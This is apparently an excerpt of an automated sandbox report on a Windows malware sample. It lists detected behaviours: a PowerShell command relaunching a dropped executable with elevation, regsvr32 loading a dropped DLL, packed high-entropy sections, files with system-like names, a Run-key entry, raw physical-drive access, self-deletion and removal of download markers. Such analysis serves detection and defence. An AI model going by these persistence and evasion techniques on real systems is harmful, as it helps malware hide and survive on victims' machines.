                  Suspicious powershell command line found
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004165C0 LoadLibraryW,GetProcAddress,VirtualProtect,1_2_004165C0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .
                  Source: vueqjgslwynd.exe.43.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                  Source: A6A0.tmp.20.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                  Source: is-88CHK.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0xb9261
                  Source: BroomSetup.exe.34.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                  Source: anyburnfree.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                  Source: INetC.dll.34.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                  Source: 288c47bbc1871b439df19ff4df68f076.exe.29.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
                  Source: 97EA.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1baa0b
                  Source: BB62.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x8be514
                  Source: A6A0.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x7f9fb2
                  Source: _isdecmp.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x5528
                  Source: _iscrypt.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                  Source: _setup64.tmp.21.drStatic PE information: real checksum: 0x0 should be: 0x8546
                  Source: FourthX.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x29585f
                  Source: A6A0.tmp.17.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                  Source: InstallSetup4.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x20eded
                  Source: ccQGH1mKws.exeStatic PE information: section name: .bizope
                  Source: ccQGH1mKws.exeStatic PE information: section name: .homupin
                  Source: DC49.exe.2.drStatic PE information: section name: .rofi
                  Source: DC49.exe.2.drStatic PE information: section name: .rehopeb
                  Source: DC49.exe.2.drStatic PE information: section name: .jidexi
                  Source: 8837.exe.2.drStatic PE information: section name: .fofufe
                  Source: 8837.exe.2.drStatic PE information: section name: .safaz
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: 8E91.exe.2.drStatic PE information: section name: .
                  Source: E33F.exe.2.drStatic PE information: section name: .wet
                  Source: E33F.exe.2.drStatic PE information: section name: .mixifi
                  Source: E33F.exe.2.drStatic PE information: section name: .civo
                  Source: afratej.2.drStatic PE information: section name: .bizope
                  Source: afratej.2.drStatic PE information: section name: .homupin
                  Source: vfratej.2.drStatic PE information: section name: .rofi
                  Source: vfratej.2.drStatic PE information: section name: .rehopeb
                  Source: vfratej.2.drStatic PE information: section name: .jidexi
                  Source: csrss.exe.8.drStatic PE information: section name: .fofufe
                  Source: csrss.exe.8.drStatic PE information: section name: .safaz
                  Source: anyburnfree.exe.21.drStatic PE information: section name: .cab7
                  Source: is-37AOI.tmp.21.drStatic PE information: section name: /4
                  Source: is-7865G.tmp.21.drStatic PE information: section name: /4
                  Source: is-VTCPG.tmp.21.drStatic PE information: section name: /4
                  Source: is-MN9TN.tmp.21.drStatic PE information: section name: /4
                  Source: is-IGFK1.tmp.21.drStatic PE information: section name: /4
                  Source: is-NDO9R.tmp.21.drStatic PE information: section name: /4
                  Source: is-8B8M3.tmp.21.drStatic PE information: section name: /4
                  Source: is-ETRFM.tmp.21.drStatic PE information: section name: /4
                  Source: is-AQ5SU.tmp.21.drStatic PE information: section name: /4
                  Source: is-AQ01D.tmp.21.drStatic PE information: section name: /4
                  Source: is-TU931.tmp.21.drStatic PE information: section name: /4
                  Source: is-30U3A.tmp.21.drStatic PE information: section name: /4
                  Source: is-RGLU2.tmp.21.drStatic PE information: section name: /4
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: section name: .cab7
                  Source: FourthX.exe.29.drStatic PE information: section name: .00cfg
                  Source: BroomSetup.exe.34.drStatic PE information: section name: .didata
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .sowa
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .xeyekus
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .jejol
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .sowa
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .xeyekus
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .jejol
                  Source: vueqjgslwynd.exe.43.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00403253 push eax; ret 1_2_0040332D
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00401C64 push es; retf 1_2_00401C83
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0040332A push eax; ret 1_2_0040332D
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00402F91 push 60B44389h; retf 1_2_00402FAB
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0041AEDC push 3BFFFFFFh; retf 1_2_0041AEE1
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_00416EB0 push ecx; mov dword ptr [esp], 000343F0h1_2_00416EB1
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F1CCB push es; retf 1_2_004F1CEA
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004F2FF8 push 60B44389h; retf 1_2_004F3012
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00403253 push eax; ret 6_2_0040332D
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00401C64 push es; retf 6_2_00401C83
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0040332A push eax; ret 6_2_0040332D
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_0041AEDC push 3BFFFFFFh; retf 6_2_0041AEE1
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_00416EB0 push ecx; mov dword ptr [esp], 000343F0h6_2_00416EB1
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C1CCB push es; retf 6_2_006C1CEA
                  Source: C:\Users\user\AppData\Roaming\afratejCode function: 6_2_006C2FF8 push 60B44389h; retf 6_2_006C3012
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_005CB960 push ecx; mov dword ptr [esp], 000343F0h7_2_005CB961
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00401E25 push ecx; ret 7_2_00401E38
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_023FB2EF push ebx; iretd 7_2_023FB2F7
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_0244F70A pushad ; ret 7_2_0244F70C
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024B57ED push ebp; retf 7_2_024B57EE
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024ED7F8 push edx; retf 7_2_024ED7F9
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024B580A push 5A36841Dh; retf 7_2_024B5825
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_024ED4BD push cs; ret 7_2_024ED4BE
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_0040A3BD push eax; retf 10_2_0040A3BE
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_033B30A0 push esp; iretd 15_2_033B30A7
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_0040A3BD push eax; retf 16_2_0040A3BE
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_029B049D push cs; ret 24_2_029B049E
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_029B07D8 push edx; retf 24_2_029B07D9
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_028BE2CF push ebx; iretd 24_2_028BE2D7
                  Source: C:\ProgramData\Drivers\csrss.exeCode function: 24_2_029787CD push ebp; retf 24_2_029787CE
                  Source: ccQGH1mKws.exeStatic PE information: section name: .text entropy: 7.241912923688238
                  Source: 97EA.dll.2.drStatic PE information: section name: .text entropy: 7.994843734766698
                  Source: DC49.exe.2.drStatic PE information: section name: .text entropy: 7.2499716488738954
                  Source: 8837.exe.2.drStatic PE information: section name: .text entropy: 7.985255731332923
                  Source: E33F.exe.2.drStatic PE information: section name: .text entropy: 7.23594445208119
                  Source: 671C.exe.2.drStatic PE information: section name: .text entropy: 7.78984089955939
                  Source: afratej.2.drStatic PE information: section name: .text entropy: 7.241912923688238
                  Source: vfratej.2.drStatic PE information: section name: .text entropy: 7.2499716488738954
                  Source: csrss.exe.8.drStatic PE information: section name: .text entropy: 7.985255731332923
                  Source: anyburnfree.exe.21.drStatic PE information: section name: .text entropy: 7.703107959057831
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: section name: .text entropy: 7.703107959057831
                  Source: syncUpd[1].exe.34.drStatic PE information: section name: .text entropy: 7.5073579685533876
                  Source: nsfDE87.tmp.34.drStatic PE information: section name: .text entropy: 7.5073579685533876

                  Persistence and Installation Behavior

                  barindex
                  Contains functionality to infect the boot sector
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                  Drops PE files with benign system names
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-8B8M3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeFile created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-VTCPG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-ETRFM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-NDO9R.tmpJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DC49.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BB62.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-DCV21.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-7865G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile created: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\93D2.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-AQ5SU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsfDE87.tmpJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\afratejJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-30U3A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-MN9TN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-IGFK1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeFile created: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-37AOI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeFile created: C:\Users\user\AppData\Local\Temp\FourthX.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-AQ01D.tmpJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A6A0.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8E91.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeFile created: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Temp\nsbD510.tmp\INetC.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\97EA.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E33F.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\671C.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)Jump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfratejJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-TU931.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-88CHK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\is-RGLU2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\syncUpd[1].exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8837.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpFile created: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeFile created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile created: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\afratejJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vfratejJump to dropped file

                  Boot Survival

                  barindex
                  Contains functionality to infect the boot sector
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE010_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: CreateFileA,DeviceIoControl, PHYSICALDRIVE010_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_0040895B
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408951
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: FindCloseChangeNotification,CreateFileA,DeviceIoControl, PHYSICALDRIVE016_2_00408958
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Deletes itself after installation
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ccqgh1mkws.exeJump to behavior
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\afratej:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vfratej:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
